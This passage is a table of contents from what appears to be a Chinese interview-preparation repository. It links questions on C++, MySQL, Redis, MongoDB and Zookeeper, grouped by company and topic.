什么是“引用”?申明和使用“引用”要注意哪些问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#270%E4%BB%80%E4%B9%88%E6%98%AF%E5%BC%95%E7%94%A8%E7%94%B3%E6%98%8E%E5%92%8C%E4%BD%BF%E7%94%A8%E5%BC%95%E7%94%A8%E8%A6%81%E6%B3%A8%E6%84%8F%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98) ##### [6.4.5 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#271%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [6.4.6 在什么时候需要使用“常引用”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#272%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E4%BD%BF%E7%94%A8%E5%B8%B8%E5%BC%95%E7%94%A8) ##### [6.5.0 结构与联合有何区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#273%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [6.5.1 试写出程序结果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#274%E8%AF%95%E5%86%99%E5%87%BA%E7%A8%8B%E5%BA%8F%E7%BB%93%E6%9E%9C) ##### [6.5.2 重载(overload)和重写(override,有的书也叫做“覆盖”)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#275%E9%87%8D%E8%BD%BDoverload%E5%92%8C%E9%87%8D%E5%86%99overried%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.5.3 有哪几种情况只能用initialization list 
而不能用assignment?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#276%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5%E5%8F%AA%E8%83%BD%E7%94%A8intialization-list-%E8%80%8C%E4%B8%8D%E8%83%BD%E7%94%A8assignment) <h3 id="7">滴滴篇</h3> --- ##### [7.1.0 C++是不是类型安全的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#277-c%E6%98%AF%E4%B8%8D%E6%98%AF%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E7%9A%84) ##### [7.1.1 main 函数执行以前,还会执行什么代码?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#278-main-%E5%87%BD%E6%95%B0%E6%89%A7%E8%A1%8C%E4%BB%A5%E5%89%8D%E8%BF%98%E4%BC%9A%E6%89%A7%E8%A1%8C%E4%BB%80%E4%B9%88%E4%BB%A3%E7%A0%81) ##### [7.1.2 描述内存分配方式以及它们的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#279-%E6%8F%8F%E8%BF%B0%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E4%BB%A5%E5%8F%8A%E5%AE%83%E4%BB%AC%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [7.1.3 分别写出BOOL,int,float,指针类型的变量a 与“零”的比较语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#280%E5%88%86%E5%88%AB%E5%86%99%E5%87%BAboolintfloat%E6%8C%87%E9%92%88%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%98%E9%87%8Fa-%E4%B8%8E%E9%9B%B6%E7%9A%84%E6%AF%94%E8%BE%83%E8%AF%AD%E5%8F%A5) ##### [7.1.4 请说出const与#define 相比,有何优点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#281%E8%AF%B7%E8%AF%B4%E5%87%BAconst%E4%B8%8Edefine-%E7%9B%B8%E6%AF%94%E6%9C%89%E4%BD%95%E4%BC%98%E7%82%B9) ##### [7.1.5 简述数组与指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#282%E7%AE%80%E8%BF%B0%E6%95%B0%E7%BB%84%E4%B8%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [7.1.6 int (*s[10])(int) 表示的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#283-int-s10int-%E8%A1%A8%E7%A4%BA%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [7.1.7 栈内存与文字常量区](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#284%E6%A0%88%E5%86%85%E5%AD%98%E4%B8%8E%E6%96%87%E5%AD%97%E5%B8%B8%E9%87%8F%E5%8C%BA) ##### [7.1.8 将程序跳转到指定内存地址](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#285%E5%B0%86%E7%A8%8B%E5%BA%8F%E8%B7%B3%E8%BD%AC%E5%88%B0%E6%8C%87%E5%AE%9A%E5%86%85%E5%AD%98%E5%9C%B0%E5%9D%80) ##### [7.1.9 int id[sizeof(unsigned long)];这个对吗?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#286int-idsizeofunsigned-long%E8%BF%99%E4%B8%AA%E5%AF%B9%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [7.2.0 引用与指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#287%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [7.2.1 const 与 #define 的比较 ,const有什么优点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#288const-%E4%B8%8E-define-%E7%9A%84%E6%AF%94%E8%BE%83-const%E6%9C%89%E4%BB%80%E4%B9%88%E4%BC%98%E7%82%B9) <br> <h3 id="8">京东篇</h3> --- ##### [8.1.0 内存的分配方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#289%E5%86%85%E5%AD%98%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [8.1.1 基类的析构函数不是虚函数,会带来什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#290%E5%9F%BA%E7%B1%BB%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E4%B8%8D%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0%E4%BC%9A%E5%B8%A6%E6%9D%A5%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [8.1.2 
全局变量和局部变量有什么区别?是怎么实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#291%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [8.1.3 const关键字(反义词mutable)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#292-const%E5%85%B3%E9%94%AE%E5%AD%97%E5%8F%8D%E4%B9%89%E8%AF%8Dmutable) ##### [8.1.4 static关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#293-static%E5%85%B3%E9%94%AE%E5%AD%97) ##### [8.1.5 extern关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#294-extern%E5%85%B3%E9%94%AE%E5%AD%97) ##### [8.1.6 指针和引用的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#295-%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [8.1.7 explicit是干什么用的 ?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#296explicit%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8%E7%9A%84-) ##### [8.1.8 浅拷贝与深拷贝?为什么要使用深拷贝?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#299-%E6%B5%85%E6%8B%B7%E8%B4%9D%E4%B8%8E%E6%B7%B1%E6%8B%B7%E8%B4%9D%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E4%BD%BF%E7%94%A8%E6%B7%B1%E6%8B%B7%E8%B4%9D) ##### [8.1.9 深入谈谈堆和栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#300%E6%B7%B1%E5%85%A5%E8%B0%88%E8%B0%88%E5%A0%86%E5%92%8C%E6%A0%88) ##### [8.2.0 内存的静态分配和动态分配的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#301%E5%86%85%E5%AD%98%E7%9A%84%E9%9D%99%E6%80%81%E5%88%86%E9%85%8D%E5%92%8C%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [8.2.1 什么是继承?什么是多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#303-%E4%BB%80%E4%B9%88%E6%98%AF%E7%BB%A7%E6%89%BF%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%9A%E6%80%81) ##### [8.2.2 虚函数与纯虚函数的区别?含有纯虚函数的类叫什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#306-%E8%99%9A%E5%87%BD%E6%95%B0%E4%B8%8E%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E5%90%AB%E6%9C%89%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E7%B1%BB%E5%8F%AB%E4%BB%80%E4%B9%88) <br> <h3 id="9">mysql篇</h3> --- ##### [9.1.0 主键 超键 候选键 外键](09.MySQL篇/9.1.0%20%E4%B8%BB%E9%94%AE%20%E8%B6%85%E9%94%AE%20%E5%80%99%E9%80%89%E9%94%AE%20%E5%A4%96%E9%94%AE.md) ##### [9.1.1 数据库事务的四个特性及含义](09.MySQL篇/9.1.1%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BA%8B%E5%8A%A1%E7%9A%84%E5%9B%9B%E4%B8%AA%E7%89%B9%E6%80%A7%E5%8F%8A%E5%90%AB%E4%B9%89.md) ##### [9.1.2 视图的作用,视图可以更改么?](09.MySQL篇/9.1.2%20%E8%A7%86%E5%9B%BE%E7%9A%84%E4%BD%9C%E7%94%A8%EF%BC%8C%E8%A7%86%E5%9B%BE%E5%8F%AF%E4%BB%A5%E6%9B%B4%E6%94%B9%E4%B9%88%EF%BC%9F.md) ##### [9.1.3 drop,delete与truncate的区别](09.MySQL篇/9.1.3%20drop%2Cdelete%E4%B8%8Etruncate%E7%9A%84%E5%8C%BA%E5%88%AB.md) ##### [9.1.4 索引的工作原理及其种类](09.MySQL篇/9.1.4%20%E7%B4%A2%E5%BC%95%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86%E5%8F%8A%E5%85%B6%E7%A7%8D%E7%B1%BB.md) ##### [9.1.5 连接的种类](09.MySQL篇/9.1.5%20%E8%BF%9E%E6%8E%A5%E7%9A%84%E7%A7%8D%E7%B1%BB.md) ##### [9.1.6 数据库范式](09.MySQL篇/9.1.6%20%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8C%83%E5%BC%8F.md) ##### [9.1.7 
数据库优化的思路](09.MySQL篇/9.1.7%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BC%98%E5%8C%96%E7%9A%84%E6%80%9D%E8%B7%AF.md) ##### [9.1.8 存储过程与触发器的区别](09.MySQL篇/9.1.8%20%E5%AD%98%E5%82%A8%E8%BF%87%E7%A8%8B%E4%B8%8E%E8%A7%A6%E5%8F%91%E5%99%A8%E7%9A%84%E5%8C%BA%E5%88%AB.md) <br> <h3 id="10">redis篇</h3> --- ##### [10.1.0 使用Redis有哪些好处?](10.Redis篇/10.1.0%20%E4%BD%BF%E7%94%A8Redis%E6%9C%89%E5%93%AA%E4%BA%9B%E5%A5%BD%E5%A4%84%EF%BC%9F.md) ##### [10.1.1 redis相比memcached有哪些优势?](10.Redis篇/10.1.1%20redis%E7%9B%B8%E6%AF%94memcached%E6%9C%89%E5%93%AA%E4%BA%9B%E4%BC%98%E5%8A%BF%EF%BC%9F.md) ##### [10.1.2 redis常见性能问题和解决方案](10.Redis篇/10.1.2%20redis%E5%B8%B8%E8%A7%81%E6%80%A7%E8%83%BD%E9%97%AE%E9%A2%98%E5%92%8C%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88.md) ##### [10.1.3 MySQL里有2000w数据,redis中只存20w的数据,如何保证redis中的数据都是热点数据](10.Redis篇/10.1.3%20MySQL%E9%87%8C%E6%9C%892000w%E6%95%B0%E6%8D%AE%EF%BC%8Credis%E4%B8%AD%E5%8F%AA%E5%AD%9820w%E7%9A%84%E6%95%B0%E6%8D%AE%EF%BC%8C%E5%A6%82%E4%BD%95%E4%BF%9D%E8%AF%81redis%E4%B8%AD%E7%9A%84%E6%95%B0%E6%8D%AE%E9%83%BD%E6%98%AF%E7%83%AD%E7%82%B9%E6%95%B0%E6%8D%AE.md) ##### [10.1.4 Memcache与Redis的区别都有哪些?](10.Redis篇/10.1.4%20Memcache%E4%B8%8ERedis%E7%9A%84%E5%8C%BA%E5%88%AB%E9%83%BD%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F.md) ##### [10.1.5 Redis 常见的性能问题都有哪些?如何解决?](10.Redis篇/10.1.5%20Redis%20%E5%B8%B8%E8%A7%81%E7%9A%84%E6%80%A7%E8%83%BD%E9%97%AE%E9%A2%98%E9%83%BD%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%EF%BC%9F.md) ##### 10.1.6 redis 最适合的场景 ##### [10.1.7 Redis的同步机制了解么?](10.Redis篇/10.1.7%20Redis%E7%9A%84%E5%90%8C%E6%AD%A5%E6%9C%BA%E5%88%B6%E4%BA%86%E8%A7%A3%E4%B9%88%EF%BC%9F.md) ##### [10.1.8 是否使用过Redis集群,集群的原理是什么?](10.Redis篇/10.1.8%20%E6%98%AF%E5%90%A6%E4%BD%BF%E7%94%A8%E8%BF%87Redis%E9%9B%86%E7%BE%A4%EF%BC%8C%E9%9B%86%E7%BE%A4%E7%9A%84%E5%8E%9F%E7%90%86%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### 10.1.9 redis集群如何保证一致性? 
<br> <h3 id="11">MongoDB篇</h3> --- ##### [11.1.0 什么是MongoDB?](11.MongoDB篇/11.1.0%20%E4%BB%80%E4%B9%88%E6%98%AFMongoDB%EF%BC%9F.md) ##### [11.1.1 MongoDB是由哪种语言写的?](11.MongoDB篇/11.1.1%20MongoDB%E6%98%AF%E7%94%B1%E5%93%AA%E7%A7%8D%E8%AF%AD%E8%A8%80%E5%86%99%E7%9A%84%EF%BC%9F.md) ##### [11.1.2 MongoDB的优势有哪些?](11.MongoDB篇/11.1.2%20MongoDB%E7%9A%84%E4%BC%98%E5%8A%BF%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F.md) ##### [11.1.3 什么是数据库?](11.MongoDB篇/11.1.3%20%E4%BB%80%E4%B9%88%E6%98%AF%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.1.4 什么是集合?](11.MongoDB篇/11.1.4%20%E4%BB%80%E4%B9%88%E6%98%AF%E9%9B%86%E5%90%88%EF%BC%9F.md) ##### [11.1.5 什么是文档?](11.MongoDB篇/11.1.5%20%E4%BB%80%E4%B9%88%E6%98%AF%E6%96%87%E6%A1%A3%EF%BC%9F.md) ##### [11.1.6 MongoDB和关系型数据库术语对比图](11.MongoDB篇/11.1.6%20MongoDB%E5%92%8C%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%AF%E8%AF%AD%E5%AF%B9%E6%AF%94%E5%9B%BE.md) ##### [11.1.7 什么是“mongod”?](11.MongoDB篇/11.1.7%20%E4%BB%80%E4%B9%88%E6%98%AF%E2%80%9Cmongod%E2%80%9D%EF%BC%9F.md) ##### [11.1.8 “mongod”参数有什么?](11.MongoDB篇/11.1.8%20%E2%80%9Cmongod%E2%80%9D%E5%8F%82%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%EF%BC%9F.md) ##### [11.1.9 什么是“mongo”?](11.MongoDB篇/11.1.9%20%E4%BB%80%E4%B9%88%E6%98%AF%E2%80%9Cmongo%E2%80%9D%EF%BC%9F.md) ##### [11.2.0 MongoDB哪个命令可以切换数据库?](11.MongoDB篇/11.2.0%20MongoDB%E5%93%AA%E4%B8%AA%E5%91%BD%E4%BB%A4%E5%8F%AF%E4%BB%A5%E5%88%87%E6%8D%A2%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.2.1 什么是非关系型数据库?](11.MongoDB篇/11.2.1%20%E4%BB%80%E4%B9%88%E6%98%AF%E9%9D%9E%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md) ##### [11.2.2 非关系型数据库有哪些类型?](11.MongoDB篇/11.2.2%20%E9%9D%9E%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%89%E5%93%AA%E4%BA%9B%E7%B1%BB%E5%9E%8B%EF%BC%9F.md) ##### [11.2.3 为什么用MongoDB?](11.MongoDB篇/11.2.3%20%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8MOngoDB%EF%BC%9F.md) ##### [11.2.4 在哪些场景使用MongoDB?](11.MongoDB篇/11.2.4%20%E5%9C%A8%E5%93%AA%E4%BA%9B%E5%9C%BA%E6%99%AF%E4%BD%BF%E7%94%A8MongoDB%EF%BC%9F.md) ##### 11.2.5 MongoDB中的命名空间是什么意思? ##### 11.2.6 哪些语言支持MongoDB? 
##### [11.2.7 How do you create a new database in MongoDB?](11.MongoDB篇/11.2.7%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%96%B0%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md)
##### [11.2.8 How do you list the databases in MongoDB?](11.MongoDB篇/11.2.8%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%88%97%E8%A1%A8%EF%BC%9F.md)
##### [11.2.9 What does sharding mean in MongoDB?](11.MongoDB篇/11.2.9%20MongoDB%E4%B8%AD%E7%9A%84%E5%88%86%E7%89%87%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D%EF%BC%9F.md)
##### [11.3.0 How do you view the connections in use by MongoDB?](11.MongoDB篇/11.3.0%20%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E4%BD%BF%E7%94%A8MongoDB%E7%9A%84%E8%BF%9E%E6%8E%A5%EF%BC%9F.md)
##### [11.3.1 What is replication?](11.MongoDB篇/11.3.1%20%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%8D%E5%88%B6%EF%BC%9F.md)
##### [11.3.2 How do you insert a document into a collection in MongoDB?](11.MongoDB篇/11.3.2%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%9C%A8%E9%9B%86%E5%90%88%E4%B8%AD%E6%8F%92%E5%85%A5%E4%B8%80%E4%B8%AA%E6%96%87%E6%A1%A3%EF%BC%9F.md)
##### [11.3.3 How do you drop a database in MongoDB?](11.MongoDB篇/11.3.3%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E9%99%A4%E5%8E%BB%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9F.md)
##### [11.3.4 How do you create a collection in MongoDB?](11.MongoDB篇/11.3.4%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AA%E9%9B%86%E5%90%88%EF%BC%9F.md)
##### [11.3.5 How do you view an already created collection in MongoDB?](11.MongoDB篇/11.3.5%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%88%9B%E5%BB%BA%E7%9A%84%E9%9B%86%E5%90%88%EF%BC%9F.md)
##### [11.3.6 How do you delete a collection in MongoDB?](11.MongoDB篇/11.3.6%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E5%88%A0%E9%99%A4%E4%B8%80%E4%B8%AA%E9%9B%86%E5%90%88%EF%BC%9F.md)
##### [11.3.7 Why use the profiler in MongoDB?](11.MongoDB篇/11.3.7%20%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%9C%A8MongoDB%E4%B8%AD%E4%BD%BF%E7%94%A8%E5%88%86%E6%9E%90%E5%99%A8%EF%BC%9F.md)
##### [11.3.8 Does MongoDB support primary-key/foreign-key relationships?](11.MongoDB篇/11.3.8%20MongoDB%E6%94%AF%E6%8C%81%E4%B8%BB%E9%94%AE%E5%A4%96%E9%94%AE%E5%85%B3%E7%B3%BB%E5%90%97%EF%BC%9F.md)
##### [11.3.9 What data types does MongoDB support?](11.MongoDB篇/11.3.9%20MongoDB%E6%94%AF%E6%8C%81%E5%93%AA%E4%BA%9B%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%EF%BC%9F.md)
##### 11.4.0 Why use the "Code" data type in MongoDB?
##### 11.4.1 Why use the "Regular Expression" data type in MongoDB?
##### 11.4.2 Why use the "Object ID" data type in MongoDB?
##### [11.4.3 How do you insert a document into a collection?](11.MongoDB篇/11.4.3%20%E5%A6%82%E4%BD%95%E5%9C%A8%E9%9B%86%E5%90%88%E4%B8%AD%E6%8F%92%E5%85%A5%E4%B8%80%E4%B8%AA%E6%96%87%E6%A1%A3%EF%BC%9F.md)
##### [11.4.4 What parts make up an "ObjectID"?](11.MongoDB篇/11.4.4%20%E2%80%9CObjectID%E2%80%9D%E6%9C%89%E5%93%AA%E4%BA%9B%E9%83%A8%E5%88%86%E7%BB%84%E6%88%90%EF%BC%9F.md)
##### [11.4.5 What is an index in MongoDB?](11.MongoDB篇/11.4.5%20%E5%9C%A8MongoDb%E4%B8%AD%E4%BB%80%E4%B9%88%E6%98%AF%E7%B4%A2%E5%BC%95%EF%BC%9F.md)
##### [11.4.6 How do you add an index?](11.MongoDB篇/11.4.6%20%E5%A6%82%E4%BD%95%E6%B7%BB%E5%8A%A0%E7%B4%A2%E5%BC%95%EF%BC%9F.md)
##### [11.4.7 What are the alternatives to MongoDB?](11.MongoDB篇/11.4.7%20MongoDB%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8F%AF%E6%9B%BF%E4%BB%A3%E4%BA%A7%E5%93%81%EF%BC%9F.md)
##### [11.4.8 How do you query documents in a collection?](11.MongoDB篇/11.4.8%20%E5%A6%82%E4%BD%95%E6%9F%A5%E8%AF%A2%E9%9B%86%E5%90%88%E4%B8%AD%E7%9A%84%E6%96%87%E6%A1%A3%EF%BC%9F.md)
##### [11.4.9 Which method formats the query output?](11.MongoDB篇/11.4.9%20%E7%94%A8%E4%BB%80%E4%B9%88%E6%96%B9%E6%B3%95%E5%8F%AF%E4%BB%A5%E6%A0%BC%E5%BC%8F%E5%8C%96%E8%BE%93%E5%87%BA%E7%BB%93%E6%9E%9C%EF%BC%9F.md)
##### 11.5.0 How do you query documents in a collection with "AND" or "OR" conditions?
##### [11.5.1 How do you update data in MongoDB?](11.MongoDB篇/11.5.1%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%9B%B4%E6%96%B0%E6%95%B0%E6%8D%AE%EF%BC%9F.md)
##### [11.5.2 How do you delete a document?](11.MongoDB篇/11.5.2%20%E5%A6%82%E4%BD%95%E5%88%A0%E9%99%A4%E6%96%87%E6%A1%A3%EF%BC%9F.md)
##### [11.5.3 How do you sort in MongoDB?](11.MongoDB篇/11.5.3%20%E5%9C%A8MongoDB%E4%B8%AD%E5%A6%82%E4%BD%95%E6%8E%92%E5%BA%8F%EF%BC%9F.md)
##### [11.5.4 What is aggregation?](11.MongoDB篇/11.5.4%20%E4%BB%80%E4%B9%88%E6%98%AF%E8%81%9A%E5%90%88%EF%BC%9F.md)
##### [11.5.5 What is a replica set in MongoDB?](11.MongoDB篇/11.5.5%20%E5%9C%A8MongoDB%E4%B8%AD%E4%BB%80%E4%B9%88%E6%98%AF%E5%89%AF%E6%9C%AC%E9%9B%86%EF%BC%9F.md)
##### 11.5.6 MongoDB storage characteristics and internals
<br>

<h3 id="12">Zookeeper</h3>

---

##### [12.1.0 What is zookeeper?](12.Zookeeper篇/12.1.0%20zookeeper%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md)
##### [12.1.1 What does zookeeper provide?](12.Zookeeper篇/12.1.1%20zookeeper%E6%8F%90%E4%BE%9B%E4%BA%86%E4%BB%80%E4%B9%88%EF%BC%9F.md)
##### [12.1.2 The zookeeper file system](12.Zookeeper篇/12.1.2%20zookeeper%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F.md)
##### [12.1.3 The four types of znode in zookeeper](https://github.com/0voice/interview_internal_reference/blob/master/12.1.3%20zookeeper%E7%9A%84%E5%9B%9B%E7%A7%8D%E7%B1%BB%E5%9E%8B%E7%9A%84znode.md)
##### [12.1.4 The zookeeper notification (watch) mechanism](12.Zookeeper篇/12.1.4%20zookeeper%E9%80%9A%E7%9F%A5%E6%9C%BA%E5%88%B6.md)
##### [12.1.5 What are zookeeper's typical use cases?](12.Zookeeper篇/12.1.5%20zookeeper%E6%9C%89%E5%93%AA%E4%BA%9B%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF%EF%BC%9F.md)
##### [12.1.6 zk as a naming service](12.Zookeeper篇/12.1.6%20zk%E7%9A%84%E5%91%BD%E5%90%8D%E6%9C%8D%E5%8A%A1.md)
##### [12.1.7 zk for configuration management](12.Zookeeper篇/12.1.7%20zk%E7%9A%84%E9%85%8D%E7%BD%AE%E7%AE%A1%E7%90%86%E6%9C%8D%E5%8A%A1.md)
##### [12.1.8 zk for cluster management](12.Zookeeper篇/12.1.8%20zk%E7%9A%84%E9%9B%86%E7%BE%A4%E7%AE%A1%E7%90%86.md)
##### [12.1.9 Distributed locks with zk](12.Zookeeper篇/12.1.9%20zk%E7%9A%84%E5%88%86%E5%B8%83%E5%BC%8F%E9%94%81.md)
##### [12.2.0 Queue management with zk](12.Zookeeper篇/12.2.0%20zk%E9%98%9F%E5%88%97%E7%AE%A1%E7%90%86.md)
##### [12.2.1 zk data replication](12.Zookeeper篇/12.2.1%20zk%E6%95%B0%E6%8D%AE%E5%A4%8D%E5%88%B6.md)
##### [12.2.2 How zk works](12.Zookeeper篇/12.2.2%20zk%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86.md)
##### [12.2.3 How zk guarantees the sequential consistency of transactions](12.Zookeeper篇/12.2.3%20zk%E6%98%AF%E5%A6%82%E4%BD%95%E4%BF%9D%E8%AF%81%E4%BA%8B%E7%89%A9%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%B8%80%E8%87%B4%E6%80%A7.md)
##### [12.2.4 Server states in a zk cluster](12.Zookeeper篇/12.2.4%20zk%E9%9B%86%E7%BE%A4%E4%B8%8Bserver%E5%B7%A5%E4%BD%9C%E7%8A%B6%E6%80%81.md)
##### [12.2.5 How does zk elect its Leader?](12.Zookeeper篇/12.2.5%20zk%E6%98%AF%E5%A6%82%E4%BD%95%E9%80%89%E4%B8%BELeader%E7%9A%84%EF%BC%9F.md)
##### [12.2.6 The zk synchronization flow](12.Zookeeper篇/12.2.6%20zk%E5%90%8C%E6%AD%A5%E6%B5%81%E7%A8%8B.md)
##### [12.2.7 Distributed notification and coordination](12.Zookeeper篇/12.2.7%20%E5%88%86%E5%B8%83%E5%BC%8F%E9%80%9A%E7%9F%A5%E5%92%8C%E5%8D%8F%E8%B0%83.md)
##### [12.2.8 zk's session mechanism](12.Zookeeper篇/12.2.8%20zk的session机制.md)
<br>

<h3 id="13">700 selected interview questions from other major companies</h3>

---

##### [13.1.0 How do you deal with multiple inheritance?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#307-%E5%A4%9A%E9%87%8D%E7%BB%A7%E6%89%BF%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3)
##### [13.1.1 Overview of derived classes and virtual functions](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#308-%E6%B4%BE%E7%94%9F%E7%B1%BB%E4%B8%8E%E8%99%9A%E5%87%BD%E6%95%B0%E6%A6%82%E8%BF%B0)
##### [13.1.2
